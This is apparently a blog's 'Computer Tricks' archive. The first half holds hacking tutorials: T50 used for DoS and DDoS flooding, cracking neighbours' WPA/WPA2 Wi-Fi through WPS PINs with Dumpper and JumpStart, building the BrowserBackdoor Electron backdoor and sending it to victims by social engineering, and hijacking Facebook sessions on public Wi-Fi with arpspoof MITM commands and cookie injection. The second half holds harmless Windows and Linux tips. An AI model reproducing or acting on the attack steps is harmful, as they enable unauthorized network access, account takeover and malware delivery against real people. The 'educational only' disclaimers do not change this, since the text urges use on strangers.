Category Archives: Computer Tricks

Best Network Packet Injector Tool

T50: Very Fast Network Stress Tool


It is the fastest network packet injector. T50 Sukhoi PAK FA is a mixed as well as fastest network packet injector.

Or you can say that it is a kind of a packet injection free which is generated by Brazilian Nelson Brito who is capable of DoS and DDoS attacks by using the theory of stress testing.


With the help of this tool, you can send a very high number of requests for packets just like that the target will not be capable of gathering all over the requests as well as answer them slowly that’s why the target may fall or may be slow down.

Recently, the T50 is capable of copying the following requests:
  • More than one million(1,000,000) packets per second of SYN Flood i.e; +50% of the network uplink on a network 1000BASE-T which is also known as Gigabit Ethernet.
  • More than 120,000 packets per second of SYN Flood i.e; +60% of the network uplink in a 100BASE-TX(Fast Ethernet).


Whereas the T50 can also send requests for packets of the protocols ICMP, IGMP, UDP and TCP sequence with the difference of microseconds.
GNU General Public License version 2.0 (GPLv2)
  • It supports many network protocols including TCP, UDP, and ICMP
  • It has more than 1,000,000 pps in gigabit networks.
  • It can simulate the attacks of DoS and DDoS



Hack Any WPA2/WEP/WPA Wifi Using Dumpper And Jumpstart [Latest Trick]

Step By Step Guide To Use WinPcap, Dumpper And JumpStart and Get Password:

Download the Dumper File Here

WinPcap: Download here

JumpStart: Download here


NOTE: You need to have Microsoft .NET Framework installed on your computer as well, or this will not work.


Disclaimer: I (The creator of the post has already stated this, but I’d like to go over it again) do not take any responsibility for your actions regarding this tutorial. This was made by the creator to demonstrate weaknesses in wireless networks and for educational purposes only. Breaching other people’s wireless networks without permission is against the law. If you want to test this tutorial, try it on your own home network.


We will be using Dumpper and Jumpstart and other suites to hijack WPA2/WEP/WPA WiFi networks. It’ll let you join without a password, then you can get the password from inside the network. I’ll show you how towards the end of the tutorial. First, download all of the programs above. Now, follow these instructions for setting it up:


Note: Dont STOP the Process. It Takes Several Minutes . Probably 4~5 Hours.(Works Only in Laptops).

Update: We have also Added the Process to Hack Wifi in Desktops Below.


Hack WiFi with Dumpper and Jumpstart:

Download and install JumpStart, WinPcap, and Dumpper

Open Dumpper. It’ll be in Spanish, so go to the far right tab and select ‘English’ in between the other two options.Your programs are set up and ready to go, now begin the process:


  • In the ‘Networks’ tab, select the network adapter you wish to use. Hit the ‘Scan’ button now.
  • After it completes the scan, go over to the ‘Wps’ tab. In the area that says ‘Connect using JumpStart’, hit ‘Browse’ to select the location of where you installed JumpStart in the previous set-up steps. (By default, it installs in C:\Program Files (x86)\Jumpstart. Don’t open it, just select the ‘Jumpstart’ folder and click ‘OK’)
  • In the area ‘Show default pin’, select ‘All networks’ isntead of ‘Only known networks’.
  • Hit the ‘Scan’ button.
  • Select the network you wish to penetrate. Remember the ‘Pin’ corresponding to your network in the scan results, this will be needed for later.
  • In the previous area ‘Connect using Jumpstart’, hit the ‘Start JumpStart’ button.
  • Under ‘What do you want to do?’, select ‘Join a wireless network’ and hit ‘Next’
  • Under ‘Which setup method do you want to use?’, select “Enter the PIN from my access point” and enter the PIN next to your network in the scan section back in the previous scan results.
  • Finally, select the targeted network from before and hit ‘Next’.Now you’re happily connected to that WiFi network you just penetrated. Do you want to see the password so you can get on from other devices without doing this process? Sure! Follow these simple steps:
  • Open the menu where you join WiFi networks/view the network you’re connected to.
  • Right click on the network you just joined and hit ‘Properties’
  • Under the ‘Security’ tab, you can see the password, but it’s just dots. Check the ‘Show characters’ box under it.
  • The password will then reveal itself.



Hacking The Wifi on Desktops?
So Many People are Doing this Hack in their Desktops.But unfortunately Desktops are not compatible for using this Hack.But Don’t worry, Here is the trick to do the same Hacking process in Destops even. You just need to buy the Wireless Adapter and Install it in your desktop.

It is worth the product and it is only last thing you need. After getting the Product Proceed as Above to hack WiFi with Dumpper and Jumpstart.You will not regret it later for buying.

Doubts? Please use the comments section and feel free to ask any question. I will definitely get it solved.



BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.


BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets.

First clone BrowserBackdoorServer repository from github, to do so type:


Follow the below steps one by one:

cd client

npm install


Now go to the client folder and open index.html file in leafpad and edit the following line now type your kali Linux ip screenshot is given below.

After finishing the above task it will create the Browser backdoor script folder for windows and Linux users


Now type the following command step by step

npm install electron-packager -g

electron-packager . –all


Now go to the server folder in browser-backdoor directory and the following command

Bundle install


After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send the Brwoserbackdoor-win32-x64 to the victim using any social engineering method when the victim clink on BrowserBackdoor file you can get the victim session example are given below.

Now type the session command to check the active session it will show you the session with id no.

Type the target command with session id to interact with current session sees the following example

Target 0

 Now if you want to more option type the help command you can get the list of all available command


NOTE: This post is only to make people aware of this backdoor i.e. Educational purpose only.



Today we’ll be hacking Facebook profiles active on your local network.
You may think, “How is this useful, nobody but me is using my network.” Well, you can use this on other Wi-Fi networks that are available for free (like at Starbucks) and crack their precious Facebook profile!



We are going to use a well known method called “The cookie injection method.” This might be far off from becoming “elite”, but you need to get familiar with your Linux distribution first.

Step 1: Get the Right “Stuff”

For this hack, you’ll need a few things. Nothing special, but you’ll need these stuff.

My best suggestion is that you first install BackTrack, Kali Linux, or Bugtraq because they have almost everything we need.

For this little magic trick, we’ll need:

  • A working Linux distribution (preferably Kali, Backtrack or Bugtraq)
  • Wireshark (a packet sniffer)
  • Firefox (web browser)
  • Nmap (scanner)
  • Greasemonkey (addon for Firefox)
  • Cookie injector (script for Greasemonkey)*

Now let’s start doing some magic! :D*

Step 2: Network Scan

First, to actually connect to a target, we’ll need an IP address. In order to get that, you’ll need to do a network scan with Nmap. So go ahead and boot up your terminal and enter the following command:

  • nmap -F 192.168.xx.xx/24

Note: If this doesn’t work, use 10.0.x.x/24 instead.

This command will scan your network for any IP addresses connected to it. The -F gives the console the instruction to use “Fast mode.” If done correctly, you should see something like this:



That’s how your Nmap scan should look like.

Step 3: Starting the “Man-in-the-Middle Attack”

Now we’re going to start a man-in-the-middle attack, MITM for short.

In MITM attack, we spoof our MAC address so that when a server responds, person sends a message to the other, he won’t be receiving that message, but he will receive messages that we send, as we’re the Man in the middle.

This might help you understand:


A man-in-the-middle attack!

Starting the Attack

To start, enter the following command in a NEW terminal window:

  • sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

This will forward your IP address. Now we’re starting the MITM by opening a NEW terminal window and entering this command:

  • sudo arpspoof -i [Interface] -t [target] [default gateway]

If you don’t know your interface and default gateway, start a new terminal and enter: ipconfig.


This is the result form the arpspoof.

Open (once again -_-) a new terminal window and enter the following command:

  • sudo arpspoof -i [interface] -t [default gateway] [target]


Another result from the arpspoof!

Note: After you entered both the arpspoof commands DON’T CLOSE THE TERMINALS.

Step 4: Firefox and Wireshark (Almost Done!)

We need a few more things in order to complete this hack!

First install Firefox, then Greasemonkey and the cookie injector script. Then, install Wireshark, which you can do by entering this command into a terminal window:

  • sudo apt-get install wireshark

After that, open up a Wireshark session (open a terminal and enter sudo Wireshark as command). Select your interface and start capturing. At the top, you should see an input box where you can add filters. Now enter this filter:

  • http.cookie contains DATR

Now you should get a list in Wireshark. Search for a cookie that contains the text GET. Locate it, click on it with the left mouse button, select copy, select bytes, select printable text only.


Wireshark result. The one you need is in the black circle.

Now go to Wireshark and go to Facebook. Make sure you’re NOT logged in. If you are, go to settings and delete all the cookies. Then go back to the Facebook log-in page, press [ALT]+C, and paste the cookie. Press OK and refresh the page.


Here you can clearly see the cookie injector script input box.

If my magic worked, you should see the main Facebook timeline. If not, then you’ve done something wrong.

My Final Comments

This hack may seem advanced, but it’s actually really easy. Once you break down all the steps, it’s a piece of cake! 😀

Now that you’ve done this, it should be clear that Facebook security isn’t very strong 😛

Quick note: This only works if your target is actually browsing through Facebook over http (not https) at the time you’re doing the hack.

Note: All contents are provided for educational purposes only. 

External Links:

HTTP Protocol:
TCP Protocol:
ARP Poisoning:


How to Enforce Secure Password Policy in Windows 7 and 8

We rely on security features like 2- factor authentication to safeguard our online data, but we tend to ignore the password policy of our personal computers (I doubt many know what it is exactly). Your Windows logon password is as important if not more, and hence not paying attention to it won’t be a wise thing to do.


It’s not that Windows doesn’t provide the option to make password policy better; it’s just that most of us are not aware of the feature. We set passwords at our convenience and then forget to change it on a timely basis.

So let me show you all the password policies that you can apply in Windows 7 and 8 to increase your computer’s security. We will also try to understand what these policies mean and how they work.

Enforcing Secure Password Policy

Open Start Menu and type in Local Security Policy to search and open it. When the Window opens up, navigate to Security Settings –> Account Policies –> Password Policy. Here you will see all the password rules that you can enforce on all the accounts that are configured on the system.


So let’s have a look what each of these policies means and how to configure them.

Enforce Password history

This particular module will keep an eye on the password that you use on your computer and store them in the history. Now when you change your password the next time, it will prompt you if you are using any of your old passwords and compel you to use a new one. Windows can record last 24 passwords, but it’s ideal to set it for last 8 passwords. To set the value, open the policy and set the value between 0 and 24.

Maximum Password Age

This particular policy will determine as to how many days you can use a password before you are forced to change it. The maximum password age can be set between 1 to 999 days. So when the user forgets to change the password in that particular time period, the system will enforce the user to change the password.


To disable the policy, simply change the value to 0 and the user’s password would never expire.

Minimum Password Age

This policy enforces the minimum number of days a user has to use a password before he can reset it. Ideally the value should not be more than 1 day, but just like the Maximum Password Age, it can be set to a number between 1 and 999 days. However, make sure that the value is less than the maximum password value.

Minimum Password Length

As the name implies, this policy makes sure that the password used by the users is of an ideal length. The ideal length of a password should be at least 8 characters but it can be any value between 1 and 14.

Password Must Meet Complexity Requirements

This is one of the most important parameters you must configure if you want the user to set a secure password that can be difficult to bypass.


If this policy is enabled, passwords must meet the following minimum requirements:

  • Not contain the user’s account name or parts of the user’s full name that exceed two consecutive characters
  • Be at least six characters in length
  • Contain characters from three of the following four categories:
  • English uppercase characters (A through Z)
  • English lowercase characters (a through z)
  • Base 10 digits (0 through 9)
  • Non-alphabetic characters (for example, !, $, #, %)
  • Complexity requirements are enforced when passwords are changed or created.

Store Password Using Reversible Encryption

This security setting determines whether the operating system stores passwords using reversible encryption. I don’t know much about the technical details related to the policy but the bottom line is that it will encrypt the password when it’s stored on the system.


So these were the 6 policies that you can enable on your Windows system to make sure that secured password policies are applied and your data remains safe from unauthorized access.

These policies might not be that useful for a normal end user, but if you are running a small business and use Windows PCs in your office then it is important that you as an admin must enable this for all the users.

Create Task Reminders Using Windows Task Scheduler Instead of Third Party Tools


There’s no dearth of task reminder tools and applications that one could use to keep a tab on his to-do list. So much so that one doesn’t care to look into the default Windows features or tools to see if there’s something like that available.

At work I always prefer to use MS Outlook as it allows me to set up the task reminders too. But if you aren’t using it for emails, it probably won’t make a lot of sense to use this heavy tool just for task reminders. In such cases I would suggest you use the Windows Task Scheduler rather than opting for a third party tool for setting up reminders.

Here’s how to schedule a reminder using the same.

Steps to Create Task Reminder Using Task Scheduler

Windows Task Scheduler is an integral part of the operating system and it can be used to accomplish many tasks like software updates, system shutdown/wakeup, disk cleanups, system maintenance, etc. Task reminder is one of the simplest uses one can put it to.


Step 1: Launch the Task Scheduler. You can do that by going to Start Menu, searching for task scheduler and then hitting Enter.


Step 2: On the Task Scheduler window the right pane is labeled as Actions. Click on the option to Create Task.


Step 3: On the next dialog, go to General tab. Give your task a Name so that you can identify it among other if when you decide to make some changes later.


Step 4: Next, switch the context to Triggers tab. Click on the New button on the bottom left of the window to define trigger details.


Step 5: For the trigger, set a start date and time, choose the recurrence behavior and define advanced settings if any. Click on Ok when done.


Step 6: Back on the Create Task window, switch to the Actions tab and create a New action.


Step 7: Choose whether you want to Display a message or Send an email. I chose the former because that shows a pop up on top of whatever you may be doing when the reminder is triggered. Fill the Title and the Message text boxes and hit on Ok.


Note: If you want you can create multiple triggers and define multiple actions for a single task.

With that done you can close all the windows that have been stacked. And then you can forget about the task. Your system will take care of reminding it to you.



While I said that I use MS Outlook at work, I have been using the Task Scheduler at home. It works seamlessly, is simple to set up and does not add to the load of my machine. Don’t you think you should also retire the third-party tools that you have been using for this (and if you are not using your smartphone for it)?

How to Create a Dummy File in Linux


Ever needed to quickly test upload/download speeds to and from your Linux web server? Create a dummy file in Linux of a fixed size for this exact purpose and get a real world connection test without any advanced software needed. When running a Linux server, the dd command(convert and copy a file) can be used for exactly this purpose, and it’s a pretty simple process.

To create a dummy file in Linux of 50MB, we first need to convert the file size into bytes (1024 x 1024 x 50 = 52428800) and then enter the following at the command prompt:

dd if=/dev/zero of=yourfilename.test bs=52428800 count=1

*change “yourfilename” to whatever you wish to call the file.

The file will then be created within the folder that you are currently in and the following output will be displayed upon successful creation(time and write speed details will obviously vary slightly):

1+0 records in
1+0 records out
5242880 bytes (50 MB) copied, 0.312 s, 33.6 MB/s

If you want to confirm the file’s creation and size details, just enter the following:

ls -lrth yourfilename.test

and then you should get an output that looks similar to below:

-rw-r–r– 1 root root 50M Jan 1 00:00 yourfilename.test

A breakdown of the command elements can be found here.

How to host website on your own PC

Your website using your own home PC , hosting form your PC will give you little bit experience of how hosting services work.You can try it for small website or personal work.To run your PC as server there are lot of software but top most popular is WAMP server and XAMP server.Here i’m using WAMP server.


Why you should use your PC for hosting???

  • Free of cost
  • Total over control in your hand
  • You can use it for fun(for experiments).

Why you should not use your PC for hosting???

  • Hosting means your PC is running 24×7 non-stop.If somehow your PC is shutdown or powered off then your website is offline from all over internet.
  • Running your PC 24×7 for website is not a good idea.
  • If your PC got corrupted then your website will too.
  • There is no surety that your ISP will providing 24×7 internet without disconnection and same applicable for power .

So,Let’s start our hosting :

Here I’m using WAMP server , you can download latest version form here.and install it.after then add the security exception for Apache in Windows Firewall.

Now after installation :

  1. Go to your browser and type localhost .Just only to make sure that you properly install and configured WAMP.(If localhost opens WAMP homepage in your browser it means you are ready to rock with your PC).
  2. Now click on WAMP icon placed in taskbar like this and then click on www directory.   d2
  3. Copy your website content and pages in www directory.Example :I made a webpage and copied it in www directory.
  4. Now go back to your browser and type localhost/mywebsite (replace mywebsite with your website page)in URL bar.You see your website like this :


Congrats your website is up and running.

But this is only works on LAN .If you want to host it on WAN then you need a static ip(i.e. A static IP address is a number (in the form of a dotted quad) that is assigned to a computer by an Internet service provider (ISP) to be its permanent address on the Internet.).Use your IP in URL bar instead of localhost then it will works on WAN means you can access your website anywhere in the world.

Troubleshooting :

  • Make sure you installed WAMP correctly
  • If you are unable to see localhost page then just turn off your firewall and then try.
  • If your website is not responding then please double check URL (discussed in step 4)

Also Read: How to Host a Folder as an FTP Server on Windows

If this post helps you in anyway then please show your support by liking us

How to Always Run a Program as Administrator in Windows 7

Security experts often advice users to use the account with lower privilege in order to prevent system from malware attacks and other risks. The Administrator account with highest privileges, which can control over the entire system, should be used only when necessary.

In Windows, you’ll find that by default most of the programs run in the standard mode (even if you are using the admin user profile). But there are programs (like the Windows 7 DreamScene Activator we talked about) that need to be started in the administrator mode for them to function properly. Also, at times, even common applications like the Notepad need to be run as administrator.


So how do you run a program as an administrator? Well, just right click the program and choose “Run as administrator” in context menu. Better, you can use the keyboard shortcut trick to do it.

But it may be a little inconvenience to go through the same steps again and again, especially if the program is meant to be run in the admin mode all the time. Keeping that in mind, here are two solutions.

1. Enable the Administrator account

Yes, you can enable system built-in Administrator account, which was hidden by default (this is a risky method by the on to know why).

Type “cmd” in the Windows search bar, and then right click on the “cmd” item, select “Run as administrator”.


Enter the following command into it:

net user administrator /active:yes

Command Prompt will return the execution result, which should be:

The command completed successfully.


Now you can migrate your personal data from current user profile to the new one, and launch any program as administrator.

Important: The above method is equivalent to turning off UAC as well as other system protection features. Hence, if you aren’t someone who’s been playing with computers since childhood and knows what he is doing, following the next method suggested.

2. Create Shortcut With Admin Privileges

A better solution is to create a shortcut that has administrator privileges. This could be done for specific applications which need to be run as administrator frequently.

Right click the program icon present on your desktop, taskbar, start menu or any other location.


Go to the properties, and then switch to “Shortcut” tab, and there you will find a button labeled “Advanced.” Click on it.


Check the “Run as administrator” box, and then press OK.


From now on, this shortcut icon will run the program with administrator’s privileges all the time.

Note: Again, before going ahead and enabling this for a program, make sure the it is safe enough.

How to Easily Take Ownership of Any File or Folder on Windows

If you have to work in a shared system environment you might be aware of the fact that taking ownership of a file or a folder on Windows can be a complicated chore. Even the seemingly simple task of adding URLs to a Windows Host file requires the user to become an owner of the file by going into the file security settings and acquiring full access permissions to work on it. Having so many steps to complete, even when you have an admin account can be a bit frustrating.


If it’s just one file, making a change might not be too time consuming, but if you do this on a regular basis, then use this simple tool called TakeOwnershipPro to easily deal with file ownership issues.

TakeOwnershipPro for Windows

TakeOwnershipPro is a free, lightweight program that makes the process of gaining file ownership take not more than a mouse click. To get started, you can download the setup file and install it on your system. The installer is clean, with no third-party apps attached, so you can simply follow the onscreen instructions to complete the installation.

Now if you need to take ownership of any folder, launch TakeOwnershipPro, click the Add button to choose the folder or file of which you want to take ownership, or simply drag and drop the file from Windows Explorer.



Now all you need to do is click Take Ownership and wait for the tool to do its magic. Don’t forget to check the option Include subfolders and files if you wish to take ownership of everything that’s in the folder you selected.

The tool also adds itself to the Windows right-click context menu, so you can simply right click on a file or a folder to take ownership. If the User Account Control dialog box appears, click Yes to allow TakeOwnershipPro to run and make changes.



How the Tool Works

The tool simply automates the task of taking ownership of a file through its folder security settings, but most everyday Windows users are unaware of what this means. TakeOwnershipPro adds ‘Everyone’ as an owner and gives full control of that particular folder to the user.



If you wish to delete the complete ownership of the file, all you have to do is go into the Advanced Security Settings and delete the Everyone permission that has been added by TakeOwnershipPro


That was how you can easily take ownership of any file or folder. The app works on Windows 7 and above and is free to use without any limitations. So next time you get a message from Windows saying you don’t have permission to access a particular file or folder, all you need to do is use TakeOwnershipPro and show Windows who’s boss.

Feel free to ask for any further help in comments….